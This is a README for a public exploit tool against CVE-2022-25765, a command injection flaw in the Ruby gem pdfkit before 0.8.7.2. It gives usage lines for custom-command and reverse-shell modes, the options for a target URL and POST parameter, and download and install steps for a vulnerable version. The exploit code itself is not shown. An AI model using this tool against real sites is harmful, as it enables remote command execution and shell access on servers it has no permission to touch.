Like this repo? Give us a ⭐!

For educational and authorized security research purposes only.

@UNICORDev by (@NicPWNs and @Dev-Yeoj)

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

A ruby gem pdfkit is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates executable URLs or sends them to a vulnerable website running pdfkit.

  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.

Download exploit-CVE-2022-25765.py from GitHub

Download exploit-CVE-2022-25765.py from ExploitDB

searchsploit -u
searchsploit -m 51293

• python3
• python3:requests
• python3:urllib3

pdfkit Version 0.8.6

pdfkit Versions < 0.8.7.2

gem install pdfkit -v 0.8.6

• https://nvd.nist.gov/vuln/detail/CVE-2022-25765
• https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795